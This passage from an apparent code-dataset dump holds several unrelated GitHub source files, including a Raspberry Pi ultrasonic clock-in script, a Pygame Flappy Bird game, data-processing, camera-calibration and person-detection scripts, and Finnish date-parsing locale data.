pulseIn(pin,level,timeOut): # obtain pulse time of a pin under timeOut\n t0 = time.time()\n while(GPIO.input(pin) != level):\n if((time.time() - t0) > timeOut*0.000001):\n return 0;\n t0 = time.time()\n while(GPIO.input(pin) == level):\n if((time.time() - t0) > timeOut*0.000001):\n return 0;\n pulseTime = (time.time() - t0)*1000000\n return pulseTime\n \ndef getSonar(): # get the measurement results of ultrasonic module,with unit: cm\n GPIO.output(trigPin,GPIO.HIGH) # make trigPin output 10us HIGH level \n time.sleep(0.00001) # 10us\n GPIO.output(trigPin,GPIO.LOW) # make trigPin output LOW level \n pingTime = pulseIn(echoPin,GPIO.HIGH,timeOut) # read plus time of echoPin\n distance = pingTime * 340.0 / 2.0 / 10000.0 # calculate distance with sound speed 340m/s \n return distance\n \ndef setup():\n GPIO.setmode(GPIO.BOARD) # use PHYSICAL GPIO Numbering\n GPIO.setup(trigPin, GPIO.OUT) # set trigPin to OUTPUT mode\n GPIO.setup(echoPin, GPIO.IN) # set echoPin to INPUT mode\n GPIO.setmode(GPIO.BOARD) # use PHYSICAL GPIO Numbering\n for pin in motorPins:\n GPIO.setup(pin,GPIO.OUT)\n\ndef moveOnePeriod(direction,ms): \n for j in range(0,4,1): # cycle for power supply order\n for i in range(0,4,1): # assign to each pin\n if (direction == 1):# power supply order clockwise\n GPIO.output(motorPins[i],((CCWStep[j] == 1<1.5 and distance <= 5:\n URL=\"http://127.0.0.1:5050/url\"\n r=requests.get(url=URL)\n data=r.json()\n if 'result' in data:\n print(data)\n if data['result']=='nothing found':\n continue\n else:\n if data['preds'] in name:\n name.remove(data['preds'])\n count=count-1\n Whoishere(data['preds'],count) \n else:\n name.append(data['preds'])\n count=count+1\n Whoishere(data['preds'],count)\n \n \n print(data)\n print(count)\n \n \n \n \nif __name__ == '__main__': # Program entrance\n print ('Program is starting...')\n setup()\n try:\n loop()\n except KeyboardInterrupt: # Press ctrl-c to end the program.\n GPIO.cleanup() # release GPIO resource\n\n\n","repo_name":"TITHI007/Smart-Clock-In-System","sub_path":"FinalCode.py","file_name":"FinalCode.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34891852191","text":"# ------------------------------------ Flappy Bird Game ------------------------------------- #\nimport random # For generating random number\nimport sys # We will use sys.exit to exit the Program\nimport pygame # Pygame for Creating Game using Python\nfrom pygame.locals import * # Basic pygame imports\n\n\n# ------------------------- Global Variables For Game --------------------- #\n\nFPS = 32 # Frames per Second For Rendering images\nSCREEN_WIDTH = 289 # Width of Screen\nSCREEN_HEIGHT = 511 # Height of Screen\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT)) # Initialize a window or screen for display\nGROUND_Y = (SCREEN_HEIGHT * 0.3) + 34 # For our Base image\nGAME_SPRITES = {} # For all kind of images\nGAME_SOUNDS = {} # For all kind of Sounds\nPLAYER = 'gallery/Sprites/bird.png' # path of Bird image\nBACKGROUND = 'gallery/Sprites/Background.png' # path of Background image\nPIPE = 'gallery/Sprites/Pipe.png' # path of Pipe image\n\n# ------------------------------------------------------------------ #\n\n# --------------------------------- Functions -------------------------- #\n\n\n# ---------------------- Function For Welcome Screen ------------------- #\ndef welcomeScreen():\n \"\"\"\n Shows welcome images on the Screen\n \"\"\"\n player_x = int(SCREEN_WIDTH - 300) # For Bird x Position\n player_y = int((SCREEN_HEIGHT - GAME_SPRITES['player'].get_height() + 25)/2) # For Bird y position\n\n message_x = int(SCREEN_WIDTH - GAME_SPRITES['message'].get_width()) # For message x Position\n message_y = int(SCREEN_HEIGHT - 530) # For message y position\n\n base_x = 0\n\n while True:\n for event in pygame.event.get(): # get events from the queue\n # if user click on cross button, close the game\n if event.type == QUIT or (event.type == KEYDOWN and event.type == K_ESCAPE): # KEYDOWN == any key press\n pygame.quit()\n sys.exit()\n\n # if user presses the space or up key start the game for them\n elif event.type == KEYDOWN or (event.type == K_SPACE or event.type == K_UP):\n return\n else:\n # .blit(image for blit, x and y position )\n SCREEN.blit(GAME_SPRITES['background'], (0, 0)) # Screen is a surface where all images will be blit\n SCREEN.blit(GAME_SPRITES['player'], (player_x, player_y))\n SCREEN.blit(GAME_SPRITES['message'], (message_x, message_y))\n SCREEN.blit(GAME_SPRITES['base'], (base_x, GROUND_Y))\n\n pygame.display.update() # Update portions of the screen for software displays\n FPS_CLOCK.tick(FPS) # To control fps of the game.\n# ----------------------------------------------------------------------------------------------------------- #\n\n\n# ---------------------------------------- Function for Main Game ---------------------------------- #\ndef mainGame():\n \"\"\"\n This is the main function, run's after welcome screen\n \"\"\"\n score = 0 # Score variable for storing player score in game\n player_x = int(SCREEN_WIDTH - 300) # For Bird x Position\n player_y = int((SCREEN_HEIGHT - GAME_SPRITES['player'].get_height() + 25)/2) # For Bird y position\n base_x = 0 # For base image x position\n\n # Create two pipes for blitting on the screen\n new_pipe1 = getRandomPipe()\n new_pipe2 = getRandomPipe()\n\n # my list for upper pipe\n upper_pipe = [\n {'x': SCREEN_WIDTH + 200, 'y': new_pipe1[0]['y']},\n {'x': SCREEN_WIDTH + 200 + (SCREEN_WIDTH/2), 'y': new_pipe2[0]['y']}\n ]\n\n # my list for lower pipe\n lower_pipe = [\n {'x': SCREEN_WIDTH + 200, 'y': new_pipe1[1]['y']},\n {'x': SCREEN_WIDTH + 200 + (SCREEN_WIDTH/2), 'y': new_pipe2[1]['y']}\n ]\n\n pipe_velocity_x = -4 # Moving speed of pipes x toward left <-----\n\n player_velocity_y = -9 # speed of player spill down (y position)\n player_max_velocity_y = 10\n player_min_velocity_y = -8\n player_acceleration_y = 1\n\n player_flapped_velocity = -8 # velocity while flap\n player_flapped = False # it is True when bird is flapping\n\n # Game Loop\n while True:\n for event in pygame.event.get(): # get events from the queue\n # if user click on cross button, close the game\n if event.type == QUIT or (event.type == KEYDOWN and event.type == K_ESCAPE): # KEYDOWN == any key press\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN and (event.type == K_SPACE or event.type == K_UP):\n if player_y > 0:\n player_velocity_y = player_flapped_velocity\n player_flapped = True\n GAME_SOUNDS['wing'].play()\n\n # Storing isCollide Function in crashTest Variable\n crash_test = isCollide(player_x, player_y, upper_pipe, lower_pipe)\n if crash_test:\n return\n\n # Check for score\n player_mid_position = player_x + GAME_SPRITES['player'].get_width()/2 # center position of player\n\n for pipe in upper_pipe:\n pipe_mid_position = pipe['x'] + GAME_SPRITES['pipe'][0].get_width()/2 # center position of player\n if pipe_mid_position <= player_mid_position < pipe_mid_position + 4:\n score += 1\n print(f\"Your Score is {score}\")\n GAME_SOUNDS['point'].play()\n\n # For movement of player\n if player_velocity_y < player_max_velocity_y and not player_flapped:\n player_velocity_y += player_acceleration_y\n\n if player_flapped:\n player_flapped = False\n player_height = GAME_SPRITES['player'].get_height()\n player_y = player_y + min(player_velocity_y, GROUND_Y - player_y - player_height)\n\n # move pipes to the left\n for upper_pipe, lower_pipe in zip(upper_pipe, lower_pipe):\n upper_pipe['x'] += pipe_velocity_x\n lower_pipe['x'] += pipe_velocity_x\n\n # add a new pipe when the first pipe is obout to cross the leftmost part of the screen\n if 0 < upper_pipe[0]['x'] < 5:\n new_pipe = getRandomPipe()\n upper_pipe.append(new_pipe[0])\n lower_pipe.append(new_pipe[1])\n\n # if the pipe is out of screen, remove it\n if upper_pipe[0]['x'] < -GAME_SPRITES['pipe'][0].get_width():\n upper_pipe.pop(0)\n lower_pipe.pop(0)\n\n # Let's blit our sprites now\n SCREEN.blit(GAME_SPRITES['background'], (0, 0)) # bilt background\n\n for upper_pipe, lower_pipe in zip(upper_pipe, lower_pipe): # blit pipes\n SCREEN.blit(GAME_SPRITES['pipe'][0], (upper_pipe['x'], upper_pipe['y'])) # blit upper pipes\n SCREEN.blit(GAME_SPRITES['pipe'][1], (lower_pipe['x'], lower_pipe['y'])) # blit lower pipes\n\n SCREEN.blit(GAME_SPRITES['base'], (base_x, GROUND_Y)) # blit base\n SCREEN.blit(GAME_SPRITES['player'], (player_x, player_y)) # blit player\n\n my_digits = [int(x) for x in list(str(score))]\n width = 0\n for digits in my_digits:\n width += GAME_SPRITES['numbers'][digits].get_width()\n x_offset = (SCREEN_WIDTH - width)/2\n\n for digits in my_digits:\n SCREEN.blit(GAME_SPRITES['numbers'][digits], (x_offset, SCREEN_WIDTH * 0.12))\n x_offset += GAME_SPRITES['numbers'][digits].get_width()\n pygame.display.update()\n FPS_CLOCK.tick(FPS)\n\n# ----------------------------------------------------------------------------------------------------- #\n\n\n# ----------------------------------- For for random pipes ------------------------- #\ndef getRandomPipe():\n \"\"\"\n generate two pipes (one rotated for top, and one bottom straight ) for blitting on the screen\n \"\"\"\n pipe_height = GAME_SPRITES['pipe'][0].get_height() # For Pipe Height\n offset = SCREEN_HEIGHT / 3 # For top rotated pipe\n y2 = offset + random.randrange(0, int(SCREEN_HEIGHT - GAME_SPRITES['base'].get_height() + 1.2 * offset))\n # lower pipe y position\n\n pipe_x = SCREEN_WIDTH + 10 # For x position of upper pipe and lower pipe\n y1 = pipe_height - y2 + offset # upper pipe y position\n pipe = [\n {'x': pipe_x, 'y': -y1}, # For upper pipe (that's why in -1)\n {'x': pipe_x, 'y': y2} # For lower pipe\n ]\n return pipe\n# ----------------------------------------------------------------------------------- #\n\n\ndef isCollide(player_x, player_y, upper_pipe, lower_pipe):\n if player_y > GROUND_Y - 25 or player_y < 0:\n GAME_SOUNDS['hit'].play()\n return True\n\n for pipe in upper_pipe:\n pipe_height = GAME_SPRITES['pipe'][0].get_height()\n if player_y < pipe_height + pipe['y'] and abs(player_x - pipe['x']) < GAME_SPRITES['pipe'][0].get_width():\n GAME_SOUNDS['hit'].play()\n return True\n\n for pipe in lower_pipe:\n if (player_y + GAME_SPRITES['player'].get_height() > pipe['y']) and abs(player_x - pipe['x']) < \\\n GAME_SPRITES['pipe'][0].get_width():\n GAME_SOUNDS['hit'].play()\n return True\n\n return False\n\n# -------------------------------------------------------------------------------------- #\n# ------------------------------------------ !!!!! ---------------------------------------------- #\n\n\nif __name__ == '__main__':\n # This will be the main point from where our Game start's\n pygame.init() # initialize all imported pygame modules\n FPS_CLOCK = pygame.time.Clock() # create an object to help track time\n pygame.display.set_caption('FlappyBird By Sheheryar') # Set the current window caption\n\n # ---------------------------- Adding All Images in Game_Sprites Dictionary ------------------------ #\n\n GAME_SPRITES['numbers'] = (\n pygame.image.load('gallery/Sprites/Zero.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/One.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Two.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Three.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Four.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Five.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Seven.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Eight.png').convert_alpha(),\n pygame.image.load('gallery/Sprites/Nine.png').convert_alpha()\n ) # Adding all numbers images in Game Sprites Dictionary after storing in a tuple\n # Convert_alpha == change the pixel format of an image including per pixel alphas)\n\n GAME_SPRITES['message'] = pygame.image.load('gallery/Sprites/message.png').convert_alpha() # Adding a message image\n GAME_SPRITES['base'] = pygame.image.load('gallery/Sprites/Base.png').convert_alpha() # Adding a Base image\n GAME_SPRITES['background'] = pygame.image.load(BACKGROUND).convert() # Adding a Background image\n GAME_SPRITES['player'] = pygame.image.load(PLAYER).convert_alpha() # Adding a Bird image\n\n GAME_SPRITES['pipe'] = (pygame.transform.rotate(pygame.image.load(PIPE).convert_alpha(), 180), # Rotate image (180)\n pygame.image.load(PIPE)) # Pipe image for base\n # -------------------------------------------------------------------------------------- #\n\n # ---------------------------- Adding All Sounds in Game_Sounds Dictionary ------------------------ #\n\n # pygame.mixer.Sound() == Create a new Sound object from a file or buffer object\n GAME_SOUNDS['die'] = pygame.mixer.Sound('gallery/Audio/die.wav')\n GAME_SOUNDS['hit'] = pygame.mixer.Sound('gallery/Audio/hit.wav')\n GAME_SOUNDS['point'] = pygame.mixer.Sound('gallery/Audio/point.wav')\n GAME_SOUNDS['swoosh'] = pygame.mixer.Sound('gallery/Audio/swooshing.wav')\n GAME_SOUNDS['wing'] = pygame.mixer.Sound('gallery/Audio/wing.wav')\n\n # Game Loop\n while True:\n welcomeScreen() # Shows the welcome screen util the user presses a button\n mainGame() # This is the main Game Function\n","repo_name":"CaptainSherry49/Python-Project-Beginner-to-Advance","sub_path":"Flappy Bird/Project 2 - Coding Flappy Bird Game.py","file_name":"Project 2 - Coding Flappy Bird Game.py","file_ext":"py","file_size_in_byte":12025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11286749801","text":"import heapq\njianchu_path = r'C:\\Users\\邓秋洋\\Desktop\\07.analysis_bypogenData\\病原数据按照组织归类SDSMRN版\\真菌不同类型不同菌株梯度检出率统计-SDSMRN\\不同类型下的不同菌株的检出率03版.txt'\nfilter_jianchu_path = r'C:\\Users\\邓秋洋\\Desktop\\07.analysis_bypogenData\\病原数据按照组织归类SDSMRN版\\真菌不同类型不同菌株梯度检出率统计-SDSMRN\\jianchulv2.csv'\nf = open(jianchu_path,'r',encoding = 'gbk')\no = open(filter_jianchu_path,'w', encoding ='gbk')\nf.readline()\norgan_dict = {}\npathogen_list = []\nfor line in f.readlines():\n if line == '\\n':\n continue\n name = line.rstrip().split()[0].split('_')[0]\n species = line.rstrip().split()[0].split('_')[2] + ' ' + line.rstrip().split()[0].split('_')[3].split(':')[0]\n organ_dict_key = name\n organ_dict_value = (species,line.rstrip().split()[1:])\n organ_dict.setdefault(organ_dict_key,[]).append(organ_dict_value)\norgan_species_rata_list = []\nspecies_set = []\nfor organ_name in organ_dict.keys():\n rate_list = []\n for species,jianchu_rate in organ_dict[organ_name]:\n rate_list.append(float(jianchu_rate[0].strip('%')))\n a_max_index = []\n for i in range(25):\n inf = 0\n a_max_index.append(rate_list.index(max(rate_list)))\n rate_list[rate_list.index(max(rate_list))] =inf\n species_rata_list = [organ_dict[organ_name][i] for i in a_max_index]\n species_set.append(species_rata_list)\n organ_species_rata_list.append((organ_name,species_rata_list))\nfor i in organ_species_rata_list:\n organ_name,species_rata_list = i\n o.write(organ_name )\n [o.write(','+str(i)) for i in range(1,21)]\n o.write('\\n')\n for species,rate_list in species_rata_list:\n o.write(species)\n # print(type(rate_list))\n rate_temp = [float(i.strip('%')) for i in rate_list]\n [o.write(',' + str(i)) for i in rate_temp]\n o.write('\\n')\n o.write('\\n')\n","repo_name":"quincy-deng/pathogen-in-BGI","sub_path":"09.已完成/01.不同采样部位病原菌水平分析/08.Training/huatu.py","file_name":"huatu.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40331150550","text":"'''Calibrate camera intrinsics given checkerboard videos (performed individually) and selected frame folder\n'''\nimport argparse\nimport cv2\nimport numpy as np\nimport os\nimport glob\nimport pickle\n\ndef calibrate_cam(video_path, frames=[], show_img=False):\n # Set up calibration flags\n CHECKERBOARD = (13,16)\n SQUARE_SIZE = 40.0\n subpix_criteria = (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1)\n calibration_flags = cv2.fisheye.CALIB_RECOMPUTE_EXTRINSIC+cv2.fisheye.CALIB_FIX_SKEW+cv2.fisheye.CALIB_CHECK_COND\n\n objp = np.zeros((1, CHECKERBOARD[0]*CHECKERBOARD[1], 3), np.float32)\n objp[0,:,:2] = np.mgrid[0:CHECKERBOARD[0], 0:CHECKERBOARD[1]].T.reshape(-1, 2) * SQUARE_SIZE\n\n _img_shape = None\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n cap = cv2.VideoCapture(video_path)\n\n for frame in frames:\n cap.set(cv2.CAP_PROP_POS_FRAMES, frame)\n _, img = cap.read()\n if _img_shape == None:\n _img_shape = img.shape[:2]\n else:\n assert _img_shape == img.shape[:2], \"All images must share the same size.\"\n \n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n \n \n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH+cv2.CALIB_CB_FAST_CHECK+cv2.CALIB_CB_NORMALIZE_IMAGE)\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n corners2 = cv2.cornerSubPix(gray,corners,(3,3),(-1,-1),subpix_criteria)\n imgpoints.append(corners2)\n\n if show_img:\n cv2.drawChessboardCorners(img, CHECKERBOARD, corners2, ret)\n cv2.imshow('Img', img)\n cv2.waitKey(1)\n\n rms, mtx, dist, rvecs, tvecs = \\\n cv2.fisheye.calibrate(\n objpoints,\n imgpoints,\n gray.shape[::-1],\n None,\n None,\n None,\n None,\n calibration_flags,\n (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30, 1e-6)\n )\n\n print(\"DIM=\" + str(_img_shape[::-1]))\n print(\"K=np.array(\" + str(mtx.tolist()) + \")\")\n print(\"D=np.array(\" + str(dist.tolist()) + \")\")\n print(\"RMS: \", rms)\n\n return mtx, dist\n\ndef calibrate_folder(folder, frame_folder, output='cam_params.pkl', img_count=100):\n def get_frames(paths):\n frames = []\n for path in paths:\n curr_id = os.path.split(path)[-1]\n curr_id = int(''.join(x for x in curr_id if x.isdigit()))\n frames.append(curr_id)\n return frames\n\n videos = sorted(glob.glob(os.path.join(folder, '*.mp4')))\n \n imgs = sorted(glob.glob(os.path.join(frame_folder, '*.png')), key=os.path.getmtime)\n frames = get_frames(imgs)\n\n if len(frames) > img_count:\n frames = np.random.choice(frames, img_count, replace=False)\n\n cams = []\n for video in videos:\n K, D = calibrate_cam(video, frames)\n cam = {\n 'K': K, # intrinsics\n 'D': D # distortion coefficients\n }\n cams.append(cam)\n\n with open(output, 'wb') as handle:\n pickle.dump(cams, handle)\n\ndef check_calibration():\n with open('cam_params.pkl', 'rb') as handle:\n b = pickle.load(handle)\n print(b)\n\ndef get_opts():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('root_dir', type=str,\n help='root directory of video folder')\n parser.add_argument('--frame_folder', type=str,\n help='directory of predetermined frames')\n parser.add_argument('--output', type=str,\n help='output filename')\n parser.add_argument('--img_count', type=int,\n help='max image count to use', default=100)\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = get_opts()\n calibrate_folder(args.root_dir, args.frame_folder, args.output, args.img_count)","repo_name":"ken2576/multiview_preprocessing","sub_path":"calib_intrinsics_from_folder.py","file_name":"calib_intrinsics_from_folder.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"21492015473","text":"###################################################################################\n# This file is part of GaitUtils.\n# This code is offered without any warranty or support for only research purposes.\n#\n# If you either use this code or find useful this repository, please, cite any of the following related works:\n# [A] Francisco M. Castro, Manuel J. Marín-Jiménez, Nicolás Guil, Santiago Lopez Tapia, Nicolas Pérez de la Blanca:\n# Evaluation of Cnn Architectures for Gait Recognition Based on Optical Flow Maps. BIOSIG 2017: 251-258\n# [B] Rubén Delgado-Escaño, Francisco M. Castro, Julián Ramos Cózar, Manuel J. Marín-Jiménez, Nicolás Guil:\n# MuPeG - The Multiple Person Gait Framework. Sensors 20(5): 1358 (2020)\n# [C] Francisco M. Castro, Manuel J. Marín-Jiménez, Nicolás Guil, Nicolás Pérez de la Blanca:\n# Multimodal feature fusion for CNN-based gait recognition: an empirical comparison. Neural Comput. Appl. 32(17): 14173-14193 (2020)\n###################################################################################\n\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport argparse\nimport glob\nimport os\nimport pickle\n\n# Detection class.\nclass DetectionModel(object):\n\tdef __init__(self, model_path):\n\t\t\"\"\"Creates and loads pretrained deeplab model.\"\"\"\n\t\tself.graph = tf.Graph()\n\t\twith tf.gfile.GFile(model_path, 'rb') as fid:\n\t\t\tod_graph_def = tf.GraphDef.FromString(fid.read())\n\n\t\twith self.graph.as_default():\n\t\t\ttf.import_graph_def(od_graph_def, name='')\n\n\t\tself.sess = tf.Session(graph=self.graph)\n\n\tdef run(self, image):\n\t\t\"\"\"Runs inference on a single image.\n\n\t\tArgs:\n\t\t\timage: A PIL.Image object, raw input image.\n\n\t\tReturns:\n\t\t\tresized_image: RGB image resized from original input image.\n\t\t\tseg_map: Segmentation map of `resized_image`.\n\t\t\"\"\"\n\t\t# Get handles to input and output tensors\n\t\tops = self.graph.get_operations()\n\t\tall_tensor_names = {output.name for op in ops for output in op.outputs}\n\t\ttensor_dict = {}\n\t\tfor key in [\n\t\t\t'num_detections', 'detection_boxes', 'detection_scores',\n\t\t\t'detection_classes', 'detection_masks'\n\t\t]:\n\t\t\ttensor_name = key + ':0'\n\t\t\tif tensor_name in all_tensor_names:\n\t\t\t\ttensor_dict[key] = self.graph.get_tensor_by_name(\n\t\t\t\t\ttensor_name)\n\n\t\timage_tensor = self.graph.get_tensor_by_name('image_tensor:0')\n\n\t\t# Run inference\n\t\toutput_dict = self.sess.run(tensor_dict,\n\t\t feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n\t\t# all outputs are float32 numpy arrays, so convert types as appropriate\n\t\toutput_dict['num_detections'] = int(output_dict['num_detections'][0])\n\t\toutput_dict['detection_classes'] = output_dict[\n\t\t\t'detection_classes'][0].astype(np.uint8)\n\t\toutput_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n\t\toutput_dict['detection_scores'] = output_dict['detection_scores'][0]\n\n\t\treturn output_dict\n\n# Prepare input\n# Input arguments\nparser = argparse.ArgumentParser(description='Build Optical Flow dataset. Note that no data augmentation is applied')\n\nparser.add_argument('--videodir', type=str, required=False,\n default='/home/GAIT_local/Datasets/TUM_GAID/video',\n\t\t\t\t\thelp='Full path to original videos directory')\n\nparser.add_argument('--outdir', type=str, required=False,\n default='/home/GAIT_local/TUM_GAID_bb/',\n help=\"Full path for output files.\")\n\nparser.add_argument('--fpatt', type=str, required=False,\n default='*.avi',\n help=\"Video file pattern.\")\n\nargs = parser.parse_args()\n\nvideosdir = args.videodir\noutdir = args.outdir\nfpatt = args.fpatt\n\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\n\nvideos = glob.glob(os.path.join(videosdir, fpatt))\nmodel = DetectionModel('detection_model/frozen_inference_graph.pb')\n\nprint(\"* Found {} videos.\".format(len(videos)))\nfor i in range(len(videos)):\n\t# VideoCapture to extract the frames.\n\tcap = cv2.VideoCapture(videos[i])\n\n\tvideoname, ext = os.path.splitext(os.path.basename(videos[i]))\n\n\tboxes = []\n\tscores = []\n\tframes = []\n\tframe_ix = 0\n\twhile (cap.isOpened()):\n\t\t# Capture frame-by-frame\n\t\tret, frame = cap.read()\n\t\tif ret == True:\n\t\t\toutput_dict = model.run(frame)\n\n\t\t\t# Remove zero-score detections.\n\t\t\tboxes_ = []\n\t\t\tscores_ = []\n\t\t\tboxes_temp = output_dict['detection_boxes']\n\t\t\tclasses_temp = output_dict['detection_classes']\n\t\t\tscores_temp = output_dict['detection_scores']\n\t\t\tfor i in range(boxes_temp.shape[0]):\n\t\t\t\tif scores_temp[i] > 0 and classes_temp[i] == 1: # Only persons\n\t\t\t\t\tboxes_.append(boxes_temp[i])\n\t\t\t\t\tscores_.append(scores_temp[i])\n\n\t\t\tboxes.append(np.asarray(boxes_))\n\t\t\tscores.append(np.asarray(scores_))\n\t\t\tframes.append(frame_ix)\n\t\telse:\n\t\t\tbreak\n\n\t\tframe_ix = frame_ix + 1\n\t# Write output file\n\toutpath = os.path.join(outdir, videoname + '.pkl')\n\twith open(outpath, 'wb') as output:\n\t\tpickle.dump([boxes, scores, frames], output, pickle.HIGHEST_PROTOCOL)\n\nprint(\"Done!\")\n","repo_name":"avagait/gaitutils","sub_path":"detection/detect_people.py","file_name":"detect_people.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"12852286846","text":"info = {\n \"name\": \"fi\",\n \"date_order\": \"DMY\",\n \"january\": [\n \"tammi\",\n \"tammik\",\n \"tammikuu\",\n \"tammikuuta\",\n \"tammikuussa\"\n ],\n \"february\": [\n \"helmi\",\n \"helmik\",\n \"helmikuu\",\n \"helmikuuta\",\n \"helmikuussa\"\n ],\n \"march\": [\n \"maalis\",\n \"maalisk\",\n \"maaliskuu\",\n \"maaliskuuta\",\n \"maaliskuussa\"\n ],\n \"april\": [\n \"huhti\",\n \"huhtik\",\n \"huhtikuu\",\n \"huhtikuuta\",\n \"huhtikuussa\"\n ],\n \"may\": [\n \"touko\",\n \"toukok\",\n \"toukokuu\",\n \"toukokuuta\",\n \"toukokuussa\"\n ],\n \"june\": [\n \"kesä\",\n \"kesäk\",\n \"kesäkuu\",\n \"kesäkuuta\",\n \"kesäkuussa\"\n ],\n \"july\": [\n \"heinä\",\n \"heinäk\",\n \"heinäkuu\",\n \"heinäkuuta\",\n \"heinäkuussa\"\n ],\n \"august\": [\n \"elo\",\n \"elok\",\n \"elokuu\",\n \"elokuuta\",\n \"elokuussa\"\n ],\n \"september\": [\n \"syys\",\n \"syysk\",\n \"syyskuu\",\n \"syyskuuta\",\n \"Syyskuussa\"\n ],\n \"october\": [\n \"loka\",\n \"lokak\",\n \"lokakuu\",\n \"lokakuuta\",\n \"Lokakuussa\"\n ],\n \"november\": [\n \"marras\",\n \"marrask\",\n \"marraskuu\",\n \"marraskuuta\",\n \"Marraskuussa\"\n ],\n \"december\": [\n \"joulu\",\n \"jouluk\",\n \"joulukuu\",\n \"joulukuuta\",\n \"Joulukuussa\"\n ],\n \"monday\": [\n \"ma\",\n \"maanantai\",\n \"maanantaina\"\n ],\n \"tuesday\": [\n \"ti\",\n \"tiistai\",\n \"tiistaina\"\n ],\n \"wednesday\": [\n \"ke\",\n \"keskiviikko\",\n \"keskiviikkona\"\n ],\n \"thursday\": [\n \"to\",\n \"torstai\",\n \"torstaina\"\n ],\n \"friday\": [\n \"pe\",\n \"perjantai\",\n \"perjantaina\"\n ],\n \"saturday\": [\n \"la\",\n \"lauantai\",\n \"lauantaina\"\n ],\n \"sunday\": [\n \"su\",\n \"sunnuntai\",\n \"sunnuntaina\"\n ],\n \"am\": [\n \"ap\"\n ],\n \"pm\": [\n \"ip\"\n ],\n \"year\": [\n \"v\",\n \"vuosi\",\n \"vuotta\",\n \"vv\",\n \"vuonna\",\n \"vuoden\"\n ],\n \"month\": [\n \"kk\",\n \"kuukausi\",\n \"kuukautta\",\n \"kuukauden\"\n ],\n \"week\": [\n \"viikko\",\n \"vk\",\n \"viikkoa\",\n \"vko\",\n \"viikon\"\n ],\n \"day\": [\n \"pv\",\n \"päivä\",\n \"päivää\",\n \"p\",\n \"pvä\",\n \"pvää\",\n \"päivän\"\n ],\n \"hour\": [\n \"t\",\n \"tunti\",\n \"tuntia\",\n \"tunnin\"\n ],\n \"minute\": [\n \"min\",\n \"minuutti\",\n \"minuuttia\",\n \"minuutin\"\n ],\n \"second\": [\n \"s\",\n \"sekunti\",\n \"sekuntia\",\n \"sekuntti\",\n \"sekunttia\",\n \"sekuntin\",\n \"sekunnin\"\n ],\n \"relative-type\": {\n \"0 day ago\": [\n \"tänään\"\n ],\n \"0 hour ago\": [\n \"tunnin sisällä\",\n \"tämän tunnin aikana\"\n ],\n \"0 minute ago\": [\n \"minuutin sisällä\",\n \"tämän minuutin aikana\"\n ],\n \"0 month ago\": [\n \"tässä kk\",\n \"tässä kuussa\"\n ],\n \"0 second ago\": [\n \"nyt\"\n ],\n \"0 week ago\": [\n \"tällä viikolla\",\n \"tällä vk\"\n ],\n \"0 year ago\": [\n \"tänä v\",\n \"tänä vuonna\"\n ],\n \"1 day ago\": [\n \"eilen\"\n ],\n \"1 month ago\": [\n \"viime kk\",\n \"viime kuussa\"\n ],\n \"1 week ago\": [\n \"viime viikolla\",\n \"viime vk\"\n ],\n \"1 year ago\": [\n \"viime v\",\n \"viime vuonna\"\n ],\n \"in 1 day\": [\n \"huom\",\n \"huomenna\"\n ],\n \"in 1 month\": [\n \"ensi kk\",\n \"ensi kuussa\"\n ],\n \"in 1 week\": [\n \"ensi viikolla\",\n \"ensi vk\"\n ],\n \"in 1 year\": [\n \"ensi v\",\n \"ensi vuonna\"\n ],\n \"2 year ago\": [\n \"toissa vuonna\"\n ],\n \"2 month ago\": [\n \"toissa kuussa\"\n ],\n \"2 week ago\": [\n \"toissa viikolla\"\n ],\n \"2 day ago\": [\n \"toissa päivänä\"\n ]\n },\n \"relative-type-regex\": {\n \"\\\\1 day ago\": [\n \"(\\\\d+[.,]?\\\\d*) pv sitten\",\n \"(\\\\d+[.,]?\\\\d*) päivä sitten\",\n \"(\\\\d+[.,]?\\\\d*) päivää sitten\"\n ],\n \"\\\\1 hour ago\": [\n \"(\\\\d+[.,]?\\\\d*) t sitten\",\n \"(\\\\d+[.,]?\\\\d*) tunti sitten\",\n \"(\\\\d+[.,]?\\\\d*) tuntia sitten\"\n ],\n \"\\\\1 minute ago\": [\n \"(\\\\d+[.,]?\\\\d*) min sitten\",\n \"(\\\\d+[.,]?\\\\d*) minuutti sitten\",\n \"(\\\\d+[.,]?\\\\d*) minuuttia sitten\"\n ],\n \"\\\\1 month ago\": [\n \"(\\\\d+[.,]?\\\\d*) kk sitten\",\n \"(\\\\d+[.,]?\\\\d*) kuukausi sitten\",\n \"(\\\\d+[.,]?\\\\d*) kuukautta sitten\"\n ],\n \"\\\\1 second ago\": [\n \"(\\\\d+[.,]?\\\\d*) s sitten\",\n 